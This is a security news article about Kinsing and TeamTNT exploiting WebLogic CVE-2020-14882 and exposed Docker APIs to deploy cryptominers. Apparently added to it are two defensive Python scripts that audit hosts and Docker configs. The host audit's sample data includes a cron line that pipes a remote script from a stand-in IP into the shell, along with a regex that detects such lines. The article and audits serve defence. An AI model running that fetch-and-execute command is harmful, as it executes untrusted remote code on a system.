
Hackers Targeting WebLogic Servers and Docker APIs for Mining Cryptocurrencies

Malicious actors like Kinsing use both recently discovered and legacy vulnerabilities in Oracle WebLogic Server to propagate cryptocurrency mining malware.

Cybersecurity firm Trend Micro said it has found that financially motivated groups are using these vulnerabilities to drop Python scripts capable of disabling operating system (OS) security features such as Security-Enhanced Linux (SELinux).

The operators behind the Kinsing malware have been scanning for vulnerable servers to add to their botnet, going after exposed Redis and SaltStack servers as well as the Log4Shell, Spring4Shell, and Atlassian Confluence (CVE-2022-26134) vulnerabilities.

Kinsing actors have also been involved in campaigns against containerized environments, using improperly configured, openly reachable Docker Daemon API ports to launch cryptominers and spread the malware to other containers and hosts.

The latest wave of attacks involves the attackers weaponizing CVE-2020-14882 (CVSS score: 9.8), a two-year-old remote code execution (RCE) bug, to take control of servers and launch malicious payloads.

It’s worth noting that the vulnerability has been exploited in the past by multiple botnets to distribute Monero miners and the Tsunami backdoor on infected Linux systems.

Successful exploitation of the flaw is followed by the deployment of a shell script that’s responsible for a series of actions: removing the /var/log/syslog system log, turning off security features and the cloud service agents from Alibaba and Tencent, and killing competing miner processes.

The shell script then proceeds to download the Kinsing malware from a remote server, while also establishing persistence by means of a cron job.
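The post-exploitation traces described above (a deleted /var/log/syslog, SELinux switched off, a cron job that fetches and runs a remote script, and miner processes) are all things a host audit can look for. The following is an added example of such an audit, not code from the article or from Trend Micro. Every input is passed in explicitly (the SELinux config text, the list of log files present, the crontab lines, the process names) so it can be run offline against artefacts collected from a host; the sample data at the bottom is constructed, and the process-name list and the 192.0.2.10 address are assumptions for illustration.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional


@dataclass(frozen=True)
class Finding:
    severity: str   # "high" or "medium"
    indicator: str  # which trace from the article this relates to
    detail: str


# Cron entries that fetch a script over HTTP(S) and pipe it straight into a shell.
REMOTE_PIPE_RE = re.compile(r"\b(?:curl|wget)\b[^|]*https?://\S+[^|]*\|\s*(?:ba)?sh\b")
# Process names associated with these campaigns in the article (constructed list).
MINER_HINTS = ("xmrig", "kinsing")


def check_selinux(config_text: str) -> Optional[Finding]:
    """Flag SELinux disabled in /etc/selinux/config; the file content is passed in."""
    for raw in config_text.splitlines():
        line = raw.strip()
        if line.startswith("#") or not line.startswith("SELINUX="):
            continue
        mode = line.split("=", 1)[1].strip().lower()
        if mode == "disabled":
            return Finding("high", "selinux", "SELINUX=disabled in selinux config")
        return None
    return Finding("medium", "selinux", "no SELINUX= setting found in selinux config")


def check_syslog(present_logs: Iterable[str]) -> Optional[Finding]:
    """The script in the article deletes /var/log/syslog; on a host that normally
    writes it, a missing file is a strong hint that logs were wiped."""
    if "/var/log/syslog" not in set(present_logs):
        return Finding("high", "syslog", "/var/log/syslog is missing")
    return None


def check_cron(cron_lines: Iterable[str]) -> List[Finding]:
    """Flag persistence entries that download a remote script and execute it."""
    findings = []
    for line in cron_lines:
        if line.lstrip().startswith("#"):
            continue
        if REMOTE_PIPE_RE.search(line):
            findings.append(Finding("high", "cron",
                                    f"remote download piped to shell: {line.strip()}"))
    return findings


def check_processes(process_names: Iterable[str]) -> List[Finding]:
    """Flag running processes whose name matches a known miner/loader name."""
    return [Finding("high", "process", f"suspicious process name: {name}")
            for name in process_names
            if any(hint in name.lower() for hint in MINER_HINTS)]


def audit_host(selinux_config: str, present_logs: Iterable[str],
               cron_lines: Iterable[str], process_names: Iterable[str]) -> List[Finding]:
    """Run all checks and return the combined list of findings."""
    findings = [f for f in (check_selinux(selinux_config), check_syslog(present_logs)) if f]
    findings.extend(check_cron(cron_lines))
    findings.extend(check_processes(process_names))
    return findings


# Constructed sample input resembling a host after a script like the one described has run.
SAMPLE_SELINUX = ("# This file controls the state of SELinux on the system.\n"
                  "SELINUX=disabled\nSELINUXTYPE=targeted\n")
SAMPLE_LOGS = ["/var/log/auth.log", "/var/log/kern.log"]        # syslog has been removed
SAMPLE_CRON = [
    "# m h dom mon dow command",
    "0 3 * * * /usr/bin/logrotate /etc/logrotate.conf",
    "* * * * * curl -fsSL http://192.0.2.10/example.sh | sh",   # 192.0.2.0/24 is a documentation range
]
SAMPLE_PROCS = ["sshd", "rsyslogd", "xmrig", "kinsing"]

if __name__ == "__main__":
    for f in audit_host(SAMPLE_SELINUX, SAMPLE_LOGS, SAMPLE_CRON, SAMPLE_PROCS):
        print(f"[{f.severity}] {f.indicator}: {f.detail}")
```

On the constructed sample the audit reports five findings: SELinux disabled, the missing syslog, one download-and-pipe cron entry, and the two miner process names. Feeding it real data is a matter of reading /etc/selinux/config, listing /var/log, dumping root's crontab and /etc/cron.d, and collecting process names from /proc.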

“The successful exploitation of this vulnerability can lead to RCE, which can allow attackers to perform a plethora of malicious activities on affected systems,” Trend Micro said. “This can range from malware execution […] to theft of critical data, and even complete control of a compromised machine.”

TeamTNT actors make a comeback with new attacks
The development comes as researchers from Aqua Security identified three new attacks linked to another “vibrant” cryptojacking group called TeamTNT, which voluntarily shut shop in November 2021. “TeamTNT checked the Docker daemon for misconfigurations and deployed a vanilla container image, Alpine, using the command line to download a shell script (k.sh) from the C2 server.”

A notable aspect of the attack chain is that it appears to be designed to crack SECP256K1, the elliptic curve used for cryptocurrency wallet keys. If this succeeded, the actor would be able to compute the keys for any cryptocurrency wallet. In other words, the idea is to pool the hijacked processing power of a large number of targets to run an ECDLP (elliptic curve discrete logarithm problem) solver and recover the keys.

The two other attacks carried out by this group involve exploiting a publicly exposed Redis server and a misconfigured Docker API to deploy coin miners and Tsunami binaries.

TeamTNT’s targeting of the Docker REST API has been well documented over the past year. However, an operational security lapse discovered by Trend Micro revealed the credentials of two DockerHub accounts controlled by the attacker. The accounts, alpineos and sandeep078, were allegedly used to distribute various malicious payloads, including rootkits, Kubernetes exploit kits, credential-stealing tools, the XMRig Monero miner, and even the Kinsing malware.

“The alpineos account was used three times in exploit attempts on our honeypot from mid-September 2021 to early October 2021. We tracked them to their location,” said Trend Micro’s Nitesh Surana.

Either “the attacker was logged into his DockerHub registry account and may have forgotten to log out,” or the “threat actor [was] logging into his DockerHub account using alpineos credentials.”

Trend Micro said the malicious alpineos images had been downloaded more than 150,000 times, and that it has notified Docker of those accounts.

Trend Micro also recommends configuring any exposed Docker REST API to use TLS, to mitigate adversary-in-the-middle (AiTM) attacks, and using credential stores and credential helpers to hold user credentials rather than leaving them in the client config file.
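Both recommendations can be checked against the two Docker config files they concern: daemon.json for the API listener and the TLS settings, and the client's config.json for where registry credentials are kept. The following audit is an added example, not code from the article or from Trend Micro. It reads only the standard daemon.json keys (hosts, tlsverify, tlscacert, tlscert, tlskey) and config.json keys (auths, credsStore, credHelpers); the sample configs at the bottom, including the 192.0.2.5 address and the certificate paths, are constructed for illustration.

```python
import json
from typing import List


def audit_daemon_config(daemon_json_text: str) -> List[str]:
    """Return problems with a Docker daemon.json: an API listener reachable over TCP
    without client-certificate verification, missing TLS material, or a bind-all address."""
    cfg = json.loads(daemon_json_text)
    problems = []
    tcp_hosts = [h for h in cfg.get("hosts", []) if h.startswith("tcp://")]
    if tcp_hosts and not cfg.get("tlsverify", False):
        problems.append(f"TCP listener(s) {tcp_hosts} without \"tlsverify\": true; "
                        "the API accepts unauthenticated requests")
    if cfg.get("tlsverify"):
        # tlsverify is only meaningful when the CA, server cert and key are configured.
        for key in ("tlscacert", "tlscert", "tlskey"):
            if not cfg.get(key):
                problems.append(f"\"tlsverify\" is set but \"{key}\" is missing")
    for host in tcp_hosts:
        if "0.0.0.0" in host or "[::]" in host:
            problems.append(f"{host} binds all interfaces; restrict it to a management address")
    return problems


def audit_client_config(config_json_text: str) -> List[str]:
    """Return problems with a Docker client config.json: registry credentials stored
    inline (base64 user:password under "auth") instead of in a credential store/helper."""
    cfg = json.loads(config_json_text)
    problems = []
    for registry, entry in cfg.get("auths", {}).items():
        if entry.get("auth"):
            problems.append(f"credentials for {registry} are stored inline in config.json")
    if problems and not (cfg.get("credsStore") or cfg.get("credHelpers")):
        problems.append("no \"credsStore\" or \"credHelpers\" configured")
    return problems


# Constructed sample: a weak daemon.json beside its hardened form.
WEAK_DAEMON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"],
})
HARDENED_DAEMON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://192.0.2.5:2376"],
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",          # assumed paths
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
})

# Constructed sample: credentials left inline beside a config that uses a helper.
WEAK_CLIENT = json.dumps({
    "auths": {"https://index.docker.io/v1/": {"auth": "ZXhhbXBsZTpleGFtcGxl"}},  # "example:example"
})
HARDENED_CLIENT = json.dumps({
    "auths": {"https://index.docker.io/v1/": {}},
    "credsStore": "pass",                         # any installed docker-credential-* helper
})

if __name__ == "__main__":
    for label, text, fn in (("weak daemon.json", WEAK_DAEMON, audit_daemon_config),
                            ("hardened daemon.json", HARDENED_DAEMON, audit_daemon_config),
                            ("weak config.json", WEAK_CLIENT, audit_client_config),
                            ("hardened config.json", HARDENED_CLIENT, audit_client_config)):
        print(label, "->", fn(text) or "ok")
```

The weak daemon config produces two findings (no TLS verification and a bind-all listener), the weak client config two (inline credentials and no helper), and both hardened configs none. When a credential helper is in use, Docker leaves the auths entry empty and stores the secret in the helper, which is exactly what the client check looks for.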
